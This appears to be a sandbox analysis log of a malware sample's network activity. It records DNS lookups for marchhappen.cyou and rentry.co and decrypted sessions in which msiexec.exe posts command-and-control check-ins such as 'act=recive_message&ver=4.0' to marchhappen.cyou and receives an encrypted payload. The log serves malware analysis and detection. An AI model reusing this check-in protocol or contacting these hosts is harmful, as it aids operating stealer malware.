Nov 24, 2024 10:15:56.001113892 CET	443	49741	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:56.001194000 CET	49741	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:56.002417088 CET	49741	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:56.002424002 CET	443	49741	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:56.002646923 CET	443	49741	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:56.003869057 CET	49741	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:56.004064083 CET	49741	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:56.004069090 CET	443	49741	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:56.718278885 CET	443	49741	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:56.718368053 CET	443	49741	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:56.718427896 CET	49741	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:56.718575954 CET	49741	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:56.718590975 CET	443	49741	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:57.186451912 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:57.186547995 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:57.186743975 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:57.187160015 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:57.187196016 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:58.459661007 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:58.459759951 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:58.461057901 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:58.461086988 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:58.461344004 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:58.465832949 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:58.466155052 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:58.466202974 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:58.466301918 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:58.466353893 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:58.466485977 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:58.466522932 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:58.467291117 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:58.467360020 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:58.467485905 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:58.467514992 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:00.055449963 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:00.055535078 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:00.056575060 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:00.066152096 CET	49742	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:00.066199064 CET	443	49742	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:00.327320099 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:00.327389002 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:00.330543041 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:00.331165075 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:00.331188917 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:01.604109049 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:01.604187012 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:01.605746031 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:01.605757952 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:01.606002092 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:01.607351065 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:01.607378006 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:01.607419968 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:02.601522923 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:02.601614952 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:02.601758003 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:02.656311989 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:02.656335115 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:02.656347990 CET	49743	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:16:02.656353951 CET	443	49743	172.67.129.193	192.168.2.4
Nov 24, 2024 10:16:03.085010052 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:03.085057974 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:03.085167885 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:03.085500002 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:03.085520983 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.303766966 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.303857088 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:04.305496931 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:04.305511951 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.305753946 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.307475090 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:04.355329037 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.737615108 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.737711906 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.737739086 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.737766027 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.737795115 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.737819910 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.737852097 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:04.737878084 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.737889051 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:04.746078014 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.746124029 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:04.746134043 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.746217966 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:04.746320963 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:04.746342897 CET	443	49746	172.67.75.40	192.168.2.4
Nov 24, 2024 10:16:04.746351004 CET	49746	443	192.168.2.4	172.67.75.40
Nov 24, 2024 10:16:04.746356964 CET	443	49746	172.67.75.40	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 10:15:41.132910013 CET	61088	53	192.168.2.4	1.1.1.1
Nov 24, 2024 10:15:41.443476915 CET	53	61088	1.1.1.1	192.168.2.4
Nov 24, 2024 10:16:02.677901983 CET	50406	53	192.168.2.4	1.1.1.1
Nov 24, 2024 10:16:03.083558083 CET	53	50406	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2024 10:15:41.132910013 CET	192.168.2.4	1.1.1.1	0x8814	Standard query (0)	marchhappen.cyou	A (IP address)	IN (0x0001)	false
Nov 24, 2024 10:16:02.677901983 CET	192.168.2.4	1.1.1.1	0xfa37	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 24, 2024 10:15:41.443476915 CET	1.1.1.1	192.168.2.4	0x8814	No error (0)	marchhappen.cyou	172.67.129.193	A (IP address)	IN (0x0001)	false
Nov 24, 2024 10:15:41.443476915 CET	1.1.1.1	192.168.2.4	0x8814	No error (0)	marchhappen.cyou	104.21.2.224	A (IP address)	IN (0x0001)	false
Nov 24, 2024 10:16:03.083558083 CET	1.1.1.1	192.168.2.4	0xfa37	No error (0)	rentry.co	172.67.75.40	A (IP address)	IN (0x0001)	false
Nov 24, 2024 10:16:03.083558083 CET	1.1.1.1	192.168.2.4	0xfa37	No error (0)	rentry.co	104.26.2.16	A (IP address)	IN (0x0001)	false
Nov 24, 2024 10:16:03.083558083 CET	1.1.1.1	192.168.2.4	0xfa37	No error (0)	rentry.co	104.26.3.16	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

marchhappen.cyou

rentry.co

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	172.67.129.193	443	2044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-24 09:15:42 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: marchhappen.cyou
2024-11-24 09:15:42 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-24 09:15:43 UTC	1007	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 09:15:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=01mlepbr9cjra34j27oainng22; expires=Thu, 20-Mar-2025 03:02:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dMl3Q2RnwHRrQAreKfj5QuF8dxN93%2F%2Bd2UKcvkqAek3AABualGjLEdSK0LzKyGqt3aQ6Lvd5THXCxnPBhm7Ecszkqh7bwEogalGVQJ6wja6%2FPCByH2Eg43rFCozMxnPQK1TS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e784bc9be0f7290-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2013&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1430671&cwnd=248&unsent_bytes=0&cid=8c5f4a17c06a0fe3&ts=697&x=0"
2024-11-24 09:15:43 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-24 09:15:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	172.67.129.193	443	2044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-24 09:15:45 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: marchhappen.cyou
2024-11-24 09:15:45 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl8vs06&j=
2024-11-24 09:15:45 UTC	1009	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 09:15:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rs990a8mfjice91atbqbpu5gpj; expires=Thu, 20-Mar-2025 03:02:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8flb5PvKCrV43G1cK%2FsMI6sBT1KYiBvdM4mF0pZtYEIAmfpXkzN%2BHm28Q0lJccR0m3tx5H6NiWmb30NljgXBDSCvkagUml7yEoDmaLQoTAzaFpMX6Z%2BxSJkX9P%2BdbpQ7gzME"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e784bd86f9932c7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2031&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=949&delivery_rate=1403171&cwnd=137&unsent_bytes=0&cid=9ab1cf519ceddb07&ts=878&x=0"
2024-11-24 09:15:45 UTC	360	IN	Data Raw: 31 35 31 63 0d 0a 2b 51 42 72 2f 36 51 50 62 44 78 6a 39 69 64 76 45 45 57 62 36 50 34 44 47 71 69 51 2f 2f 50 51 2f 43 4f 65 74 71 4a 4a 6b 45 43 43 49 68 33 64 6e 6a 74 41 48 68 43 54 42 56 56 6b 4e 2b 36 4e 30 69 46 37 7a 4c 4c 46 6c 62 47 51 55 50 75 61 67 44 2f 39 59 73 4e 6d 43 70 50 58 61 6b 41 65 42 6f 34 46 56 55 73 2b 75 59 32 51 49 53 43 4b 39 5a 57 52 73 5a 42 42 2f 39 33 4e 4f 66 77 6a 6b 57 77 4d 6c 38 46 73 43 46 30 50 6d 30 49 4b 64 53 54 78 68 70 64 75 63 73 57 79 30 39 47 31 68 67 47 6b 6c 4f 38 73 35 43 47 30 59 52 69 55 68 6e 4a 41 52 30 47 54 53 55 30 71 5a 2f 71 4e 6e 47 39 38 7a 50 75 58 6d 37 69 59 51 50 72 63 30 69 44 32 4b 4a 46 69 44 35 62 4c 5a 52 78 51 42 5a 78 4a 44 48 38 6b 75 63 54 63 5a 6d 43 4b 71 74 33 43 67 4a 31 51 37 Data Ascii: 151c+QBr/6QPbDxj9idvEEWb6P4DGqiQ//PQ/COetqJJkECCIh3dnjtAHhCTBVVkN+6N0iF7zLLFlbGQUPuagD/9YsNmCpPXakAeBo4FVUs+uY2QISCK9ZWRsZBB/93NOfwjkWwMl8FsCF0Pm0IKdSTxhpducsWy09G1hgGklO8s5CG0YRiUhnJAR0GTSU0qZ/qNnG98zPuXm7iYQPrc0iD2KJFiD5bLZRxQBZxJDH8kucTcZmCKqt3CgJ1Q7
2024-11-24 09:15:45 UTC	1369	IN	Data Raw: 39 4f 43 47 41 73 38 49 65 52 59 58 58 41 2f 5a 36 52 74 5a 52 4c 38 39 37 45 4a 76 38 6b 6d 32 4a 4a 30 34 5a 71 46 68 35 5a 31 47 59 49 59 69 44 31 6e 4e 35 62 4f 4e 57 38 68 4e 47 31 6b 67 47 6b 6c 4d 67 75 38 53 47 51 62 51 71 56 7a 58 38 4f 54 41 65 5a 51 42 39 30 49 76 65 41 6e 33 4e 79 78 50 53 65 6d 4c 6d 58 52 50 76 51 67 47 57 79 4a 59 4d 69 55 64 33 6e 59 41 56 53 43 34 4e 46 54 57 31 70 34 4d 71 62 62 54 69 53 73 70 6d 51 74 70 39 46 38 74 72 45 4a 2f 51 73 6c 6d 30 50 6c 38 5a 71 42 46 59 4a 6c 55 67 47 66 53 66 38 68 35 68 6e 64 4d 76 33 33 64 2f 79 6d 56 6d 38 6a 49 41 46 39 53 47 4a 49 44 79 65 79 47 4d 4a 53 45 47 4c 43 78 51 79 49 50 58 4b 78 43 46 32 7a 2f 32 50 6b 4b 43 62 54 2b 37 59 78 53 33 2f 49 5a 56 69 44 4a 72 4c 59 77 68 5a 41 Data Ascii: 9OCGAs8IeRYXXA/Z6RtZRL897EJv8km2JJ04ZqFh5Z1GYIYiD1nN5bONW8hNG1kgGklMgu8SGQbQqVzX8OTAeZQB90IveAn3NyxPSemLmXRPvQgGWyJYMiUd3nYAVSC4NFTW1p4MqbbTiSspmQtp9F8trEJ/Qslm0Pl8ZqBFYJlUgGfSf8h5hndMv33d/ymVm8jIAF9SGJIDyeyGMJSEGLCxQyIPXKxCF2z/2PkKCbT+7YxS3/IZViDJrLYwhZA
2024-11-24 09:15:45 UTC	1369	IN	Data Raw: 79 49 50 58 4b 78 43 46 30 77 2f 4b 57 6d 37 61 65 52 76 48 52 77 79 7a 78 4c 35 78 6f 42 35 72 43 59 51 64 54 42 35 52 43 43 58 63 31 2f 49 4f 51 62 54 69 45 73 70 71 4a 38 73 59 42 30 39 50 57 4b 4e 30 68 69 6d 74 4a 67 6f 68 30 54 6c 6b 4e 31 42 31 4e 64 53 4c 78 67 5a 70 70 65 4e 6a 33 6b 35 71 7a 6c 45 66 39 32 63 77 74 38 69 4f 62 5a 41 57 64 77 57 6f 63 54 41 53 53 56 77 63 79 61 62 6d 4e 68 43 45 67 69 73 53 4e 68 71 4f 49 41 38 6e 58 7a 69 58 31 4e 4e 74 39 52 34 53 47 61 67 49 65 57 64 52 4f 44 58 34 67 38 59 79 59 61 58 66 46 2b 34 2b 51 76 70 42 54 2b 39 54 4a 4a 66 30 75 6b 6d 38 4f 6b 4d 31 6e 41 31 6f 47 6c 51 56 44 4d 69 44 68 79 73 51 68 54 74 72 2f 6b 62 2b 35 6b 6b 69 38 79 34 34 79 73 69 57 58 49 6c 48 64 77 6d 45 47 56 41 36 64 54 77 Data Ascii: yIPXKxCF0w/KWm7aeRvHRwyzxL5xoB5rCYQdTB5RCCXc1/IOQbTiEspqJ8sYB09PWKN0himtJgoh0TlkN1B1NdSLxgZppeNj3k5qzlEf92cwt8iObZAWdwWocTASSVwcyabmNhCEgisSNhqOIA8nXziX1NNt9R4SGagIeWdRODX4g8YyYaXfF+4+QvpBT+9TJJf0ukm8OkM1nA1oGlQVDMiDhysQhTtr/kb+5kki8y44ysiWXIlHdwmEGVA6dTw
2024-11-24 09:15:45 UTC	1369	IN	Data Raw: 6a 4a 4d 68 4e 6f 72 31 68 64 48 71 33 6d 37 62 34 59 49 4b 79 47 4b 45 4c 42 44 64 77 57 46 4f 42 6b 47 59 52 67 46 36 4b 50 2b 44 6b 47 74 78 77 66 36 57 6c 62 36 58 52 50 72 56 78 53 37 7a 4a 70 64 6f 44 35 37 46 59 67 46 52 43 64 51 4c 54 58 55 2f 75 64 4c 63 52 47 2f 42 2f 4a 76 52 72 64 42 59 76 4e 50 4d 61 36 70 69 6c 32 73 50 6d 38 4e 68 44 31 67 4a 6b 55 30 4a 63 79 48 2f 69 5a 4e 6c 66 63 76 39 6d 5a 32 38 6c 45 44 39 32 4d 73 6b 2b 53 66 62 4c 45 6d 61 33 69 31 57 48 6a 43 58 55 78 70 69 4b 37 6d 56 30 6e 67 34 7a 66 37 64 79 66 4b 66 55 2f 62 65 7a 69 37 39 4a 35 68 74 44 70 44 41 59 51 52 58 43 5a 4a 4b 42 47 41 6b 39 59 53 62 62 33 54 45 2f 35 65 53 76 39 34 50 76 4e 50 59 61 36 70 69 74 32 55 45 73 38 31 68 43 52 34 65 32 6c 78 4e 64 53 75 Data Ascii: jJMhNor1hdHq3m7b4YIKyGKELBDdwWFOBkGYRgF6KP+DkGtxwf6Wlb6XRPrVxS7zJpdoD57FYgFRCdQLTXU/udLcRG/B/JvRrdBYvNPMa6pil2sPm8NhD1gJkU0JcyH/iZNlfcv9mZ28lED92Msk+SfbLEma3i1WHjCXUxpiK7mV0ng4zf7dyfKfU/bezi79J5htDpDAYQRXCZJKBGAk9YSbb3TE/5eSv94PvNPYa6pit2UEs81hCR4e2lxNdSu
2024-11-24 09:15:45 UTC	945	IN	Data Raw: 54 6a 38 39 59 32 42 73 64 78 77 36 74 66 57 49 50 38 75 32 33 31 48 68 49 5a 71 41 68 35 5a 31 45 4d 43 65 79 54 32 69 35 56 74 64 63 2f 37 6d 4a 43 30 6d 6b 76 32 31 4d 59 74 38 79 65 52 59 51 69 58 7a 32 6f 47 57 51 4b 47 42 55 4d 79 49 4f 48 4b 78 43 46 52 7a 65 43 54 67 66 4b 42 44 2b 57 55 78 79 65 79 65 74 74 6d 41 35 4c 43 61 67 4a 59 42 4a 4a 49 44 48 30 6d 2b 59 57 59 61 6e 48 4d 38 35 43 55 76 35 70 54 39 74 2f 50 4a 2f 73 75 6c 69 4a 48 33 63 46 31 54 67 5a 42 70 55 67 44 66 43 44 76 79 6f 4d 76 59 59 72 31 6b 64 48 71 33 6b 44 77 32 38 4d 6b 38 53 47 61 61 42 75 50 79 6d 51 47 57 77 32 66 53 77 74 67 49 66 61 44 6e 32 4a 78 7a 66 71 52 6d 37 47 5a 41 62 4b 55 78 7a 4f 79 65 74 74 42 48 6f 33 4c 4c 52 45 51 47 4e 52 43 41 54 4a 2f 75 59 4b 52 Data Ascii: Tj89Y2Bsdxw6tfWIP8u231HhIZqAh5Z1EMCeyT2i5Vtdc/7mJC0mkv21MYt8yeRYQiXz2oGWQKGBUMyIOHKxCFRzeCTgfKBD+WUxyeyettmA5LCagJYBJJIDH0m+YWYanHM85CUv5pT9t/PJ/suliJH3cF1TgZBpUgDfCDvyoMvYYr1kdHq3kDw28Mk8SGaaBuPymQGWw2fSwtgIfaDn2JxzfqRm7GZAbKUxzOyettBHo3LLREQGNRCATJ/uYKR
2024-11-24 09:15:45 UTC	1369	IN	Data Raw: 32 66 35 30 0d 0a 6e 5a 69 31 6c 46 50 7a 32 38 30 6f 38 69 65 4a 59 78 75 53 7a 57 67 4e 57 67 36 62 53 51 56 34 5a 37 66 4b 6d 33 6b 34 6b 72 4b 78 6b 71 4f 55 41 39 76 4f 31 69 7a 2b 4d 35 42 76 42 64 33 5a 49 78 63 65 42 70 67 46 56 54 49 6e 2b 49 65 4f 5a 48 6e 41 2b 4a 43 5a 76 5a 74 45 38 39 44 45 49 50 77 77 6c 57 30 4a 6d 38 31 73 43 31 30 4b 6e 6b 73 45 59 47 65 33 79 70 74 35 4f 4a 4b 79 74 34 71 7a 6b 30 32 2b 2b 73 73 39 39 57 43 36 62 41 4b 61 79 6e 74 4f 51 55 2b 4e 42 51 70 2b 5a 36 48 4b 6c 57 39 30 79 66 57 56 6d 62 65 65 53 76 7a 62 79 69 58 31 4d 4a 46 75 41 34 2f 4a 62 67 4e 61 44 4a 35 41 42 47 41 69 38 49 7a 63 4c 7a 6a 4e 36 74 33 4a 38 71 5a 4b 38 75 62 44 4d 4c 49 39 31 58 74 4a 6d 73 6f 74 56 68 34 43 6b 30 59 4d 65 43 37 31 68 Data Ascii: 2f50nZi1lFPz280o8ieJYxuSzWgNWg6bSQV4Z7fKm3k4krKxkqOUA9vO1iz+M5BvBd3ZIxceBpgFVTIn+IeOZHnA+JCZvZtE89DEIPwwlW0Jm81sC10KnksEYGe3ypt5OJKyt4qzk02++ss99WC6bAKayntOQU+NBQp+Z6HKlW90yfWVmbeeSvzbyiX1MJFuA4/JbgNaDJ5ABGAi8IzcLzjN6t3J8qZK8ubDMLI91XtJmsotVh4Ck0YMeC71h
2024-11-24 09:15:45 UTC	1369	IN	Data Raw: 45 73 70 71 4a 38 73 59 42 7a 74 37 44 4a 2b 51 76 6c 43 49 57 30 39 38 74 43 56 4a 42 7a 41 55 66 59 43 66 79 69 70 74 76 61 73 76 36 6b 70 75 79 6d 45 72 32 31 38 6b 76 2f 43 75 64 59 77 53 63 78 32 30 4c 58 67 69 47 53 45 30 38 5a 2f 36 53 33 44 6b 34 2f 66 36 57 6f 4c 47 49 41 65 4f 61 32 57 76 31 4c 74 73 36 53 5a 7a 55 59 41 5a 61 41 5a 6c 44 42 6e 4d 6d 2b 6f 71 63 59 6e 6a 50 2b 5a 4b 58 74 5a 4e 4c 39 64 33 53 49 2f 59 77 6d 32 34 4e 33 59 67 74 43 55 5a 42 7a 41 55 39 63 53 7a 31 69 70 46 30 4f 4e 57 38 68 4e 47 31 6b 67 47 6b 6c 4d 67 67 2b 53 53 51 59 51 71 54 7a 57 63 42 55 51 75 53 51 77 56 33 4a 2f 57 4b 6d 57 64 38 7a 76 79 61 6e 37 2b 66 55 2f 2f 64 67 47 57 79 4a 59 4d 69 55 64 33 6d 5a 68 68 62 42 6f 49 48 4f 48 45 70 39 34 32 4b 49 57 Data Ascii: EspqJ8sYBzt7DJ+QvlCIW098tCVJBzAUfYCfyiptvasv6kpuymEr218kv/CudYwScx20LXgiGSE08Z/6S3Dk4/f6WoLGIAeOa2Wv1Lts6SZzUYAZaAZlDBnMm+oqcYnjP+ZKXtZNL9d3SI/Ywm24N3YgtCUZBzAU9cSz1ipF0ONW8hNG1kgGklMgg+SSQYQqTzWcBUQuSQwV3J/WKmWd8zvyan7+fU//dgGWyJYMiUd3mZhhbBoIHOHEp942KIW
2024-11-24 09:15:45 UTC	1369	IN	Data Raw: 30 65 72 65 42 76 2f 47 30 69 33 78 4e 4a 67 6c 4e 36 50 6d 5a 67 4a 64 44 5a 56 43 54 54 78 6e 39 73 72 45 57 44 6a 4a 34 49 2f 65 6f 34 68 4d 37 4e 4f 4d 49 2b 4d 76 6c 79 4a 48 33 59 70 70 42 56 49 45 6b 31 56 43 59 44 66 79 68 6f 6f 74 66 4e 69 79 30 39 47 6a 6c 55 37 75 32 73 64 6b 34 7a 53 57 63 67 71 59 77 53 45 47 54 77 79 59 42 55 4d 79 4d 76 4b 47 6d 6d 78 74 68 65 4f 4c 6b 71 53 5a 44 66 54 46 7a 53 65 79 48 64 55 69 45 64 32 65 4c 54 74 64 44 35 70 43 47 32 4e 71 32 59 47 51 59 6e 54 4c 39 64 33 66 38 70 67 42 70 49 65 4f 61 2f 59 7a 32 7a 70 5a 7a 35 30 34 58 51 6c 52 78 6c 70 44 61 32 66 76 79 73 51 7a 4e 6f 72 67 33 63 6e 79 32 55 4c 75 78 73 59 6f 35 43 48 63 58 44 65 63 79 32 4a 43 55 41 71 55 51 68 31 6b 50 4c 57 43 6e 33 74 69 39 4d 79 Data Ascii: 0ereBv/G0i3xNJglN6PmZgJdDZVCTTxn9srEWDjJ4I/eo4hM7NOMI+MvlyJH3YppBVIEk1VCYDfyhootfNiy09GjlU7u2sdk4zSWcgqYwSEGTwyYBUMyMvKGmmxtheOLkqSZDfTFzSeyHdUiEd2eLTtdD5pCG2Nq2YGQYnTL9d3f8pgBpIeOa/Yz2zpZz504XQlRxlpDa2fvysQzNorg3cny2ULuxsYo5CHcXDecy2JCUAqUQh1kPLWCn3ti9My
2024-11-24 09:15:45 UTC	1369	IN	Data Raw: 48 62 74 30 39 42 70 31 43 47 4e 59 55 6e 54 68 6e 56 4f 42 6b 47 31 54 78 31 2f 4b 50 37 4b 30 69 46 38 69 71 72 64 74 4c 2b 54 52 50 4c 54 67 67 72 34 4d 70 5a 74 44 74 32 49 4c 51 49 65 57 64 52 45 42 32 49 71 39 6f 33 51 5a 6d 4c 4e 73 74 50 52 76 4e 34 5a 76 4e 58 4b 4f 2f 38 74 6e 43 34 50 6b 38 67 74 45 52 41 59 31 46 4e 4e 4b 6e 53 33 79 6f 34 68 49 49 71 31 6b 35 79 7a 6e 55 2f 2f 78 74 49 74 38 54 53 59 4a 54 65 6a 34 32 41 44 57 77 2b 54 65 7a 4e 54 4c 65 6d 48 6b 32 59 36 36 76 57 4c 6b 6f 79 67 64 75 33 54 30 47 6e 55 49 59 31 68 53 64 4f 47 64 55 34 47 51 62 56 50 48 58 38 6f 2f 73 69 38 5a 6d 37 4a 73 74 50 52 74 74 34 5a 76 50 48 4e 4a 76 63 73 6e 43 41 6f 6c 39 5a 67 41 56 6c 44 74 45 49 62 63 57 65 33 79 70 41 68 49 49 72 7a 6c 34 47 2f Data Ascii: Hbt09Bp1CGNYUnThnVOBkG1Tx1/KP7K0iF8iqrdtL+TRPLTggr4MpZtDt2ILQIeWdREB2Iq9o3QZmLNstPRvN4ZvNXKO/8tnC4Pk8gtERAY1FNNKnS3yo4hIIq1k5yznU//xtIt8TSYJTej42ADWw+TezNTLemHk2Y66vWLkoygdu3T0GnUIY1hSdOGdU4GQbVPHX8o/si8Zm7JstPRtt4ZvPHNJvcsnCAol9ZgAVlDtEIbcWe3ypAhIIrzl4G/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	172.67.129.193	443	2044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
